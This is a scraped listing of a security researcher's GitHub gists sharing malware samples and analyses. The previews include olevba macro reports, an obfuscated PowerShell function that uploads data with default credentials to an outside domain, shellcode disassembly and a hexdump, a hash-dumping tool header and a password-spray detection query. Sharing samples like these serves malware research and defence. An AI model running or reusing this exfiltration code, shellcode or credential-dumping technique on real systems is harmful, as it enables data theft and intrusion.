Skip to content

Instantly share code, notes, and snippets.

John Lambert JohnLaTwC

Block or report user

Report or block JohnLaTwC

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@JohnLaTwC
JohnLaTwC / VbaProject.OTM
Created Nov 13, 2019
Malicious OTM file 7b69d70e57ea7f560d35218150f59c211b6e3f007c632bffcc56ea9dac4467c4 related to a8f5b757d2111927731c2c4730ca97a9d4f2c2b6eb9cd80bbb3ff33168bfd740
View VbaProject.OTM
## uploaded by @JohnLaTwC
## thx @MalwareRE
## see https://www.virustotal.com/gui/file/7b69d70e57ea7f560d35218150f59c211b6e3f007c632bffcc56ea9dac4467c4/detection
olevba 0.54.2 on Python 3.7.2 - http://decalage.info/python/oletools
===============================================================================
7b69d70e57ea7f560d35218150f59c211b6e3f007c632bffcc56ea9dac4467c4\7b69d70e57ea7f560d35218150f59c211b6e3f007c632bffcc56ea9dac4467c4
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ThisOutlookSession.cls
View a8f5b757d2111927731c2c4730ca97a9d4f2c2b6eb9cd80bbb3ff33168bfd740.bas
olevba 0.54.2 on Python 3.7.3 - http://decalage.info/python/oletools
===============================================================================
FILE: a8f5b757d2111927731c2c4730ca97a9d4f2c2b6eb9cd80bbb3ff33168bfd740
Type: OpenXML
-------------------------------------------------------------------------------
VBA MACRO ThisWorkbook.cls
in file: xl/vbaProject.bin - OLE stream: 'VBA/ThisWorkbook'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
View 26f5d965bd75023f0582303e76b513da87eca4f62279d6c7b7f8f7f37b97391f
This file has been truncated, but you can view the full file.
## uploaded by @JohnLaTwC
## Sample hash: 26f5d965bd75023f0582303e76b513da87eca4f62279d6c7b7f8f7f37b97391f
import subprocess
import re
import binascii
import socket
import struct
import threading
View 834fffd10bde94c6020d3ee72cc94140b29bb7ac4cd9afdb2d68278da74f5bb2
function sxuveww( $zgzbjie ){
$jcavxhj = New-Object System.Net.WebClient;
$jcavxhj.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
$jcavxhj.Headers.Add("Content-Type", "application/x-www-form-urlencoded");
$jcavxhj.Encoding = [System.Text.Encoding]::UTF8;
try{
$seezzhbd = $jcavxhj.UploadString( "http://surv.surviveandthriveparenting.com/", "guid=temp_2163694146&" + $zgzbjie );
return $seezzhbd;
}catch{};
return $false;
@JohnLaTwC
JohnLaTwC / attack.csl
Created May 7, 2019
Azure Sentinel Password spray query
View attack.csl
let valid_logons = (OfficeActivity
| where TimeGenerated > ago(30d)
| where Operation == 'UserLoggedIn'
| summarize by ClientIP);
let only_invalid_logons = (OfficeActivity
| where TimeGenerated > ago(30d)
| where Operation == 'UserLoginFailed'
| summarize by ClientIP)
| join kind=anti (valid_logons) on ClientIP;
OfficeActivity
@JohnLaTwC
JohnLaTwC / bashscript.sh
Created May 6, 2019
Bash script: 077d51016727216dd6216a3722353be274288d411a6295a5d804d251dacd88fc
View bashscript.sh
#!/bin/bash
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
#This is the Old-ReBuild Lady job copy
#
#Goal:
# The goal of this campaign is as follows;
# - To keep the internet safe.
# - To keep them hackers from causing real damage to organisations.
# - We know you feel We are a potential threat, well We ain't.
View 7d82ef55ea5f59a09c42d4c423a6e0ea33731c7e0d1f59509df390656377fea2
# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
#
# This software is provided under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Description: Performs various techniques to dump hashes from the
# remote machine without executing any agent there.
# For SAM and LSA Secrets (including cached creds)
# we try to read as much as we can from the registry
View asm
00000000 FC CLD
00000001 E882000000 CALL -FFFFFF78
00000006 60 PUSHA
00000007 89E5 MOV EBP,ESP
00000009 31C0 XOR EAX,EAX
0000000B 648B5030 MOV EDX,DWORD PTR FS:[EAX+30]
0000000F 8B520C MOV EDX,DWORD PTR [EDX+0C]
00000012 8B5214 MOV EDX,DWORD PTR [EDX+14]
00000015 8B7228 MOV ESI,DWORD PTR [EDX+28]
00000018 0FB74A26 MOVZX ECX,WORD PTR [EDX+26]
View Green shellcode winning entry
0000000: 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c LLLLLLLLLLLLLLLL
0000010: 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c LLLLLLLLLLLLLLLL
0000020: 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c LLLLLLLLLLLLLLLL
0000030: 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c LLLLLLLLLLLLLLLL
0000040: 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c LLLLLLLLLLLLLLLL
0000050: 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c LLLLLLLLLLLLLLLL
0000060: 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c LLLLLLLLLLLLLLLL
0000070: 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c LLLLLLLLLLLLLLLL
0000080: 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c LLLLLLLLLLLLLLLL
0000090: 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c LLLLLLLLLLLLLLLL
View winning chess alg
public class GregAlg : ChessAlg
{
public GregAlg()
{
}
private string LowECode(Piece p)
{
string s = "";
You can’t perform that action at this time.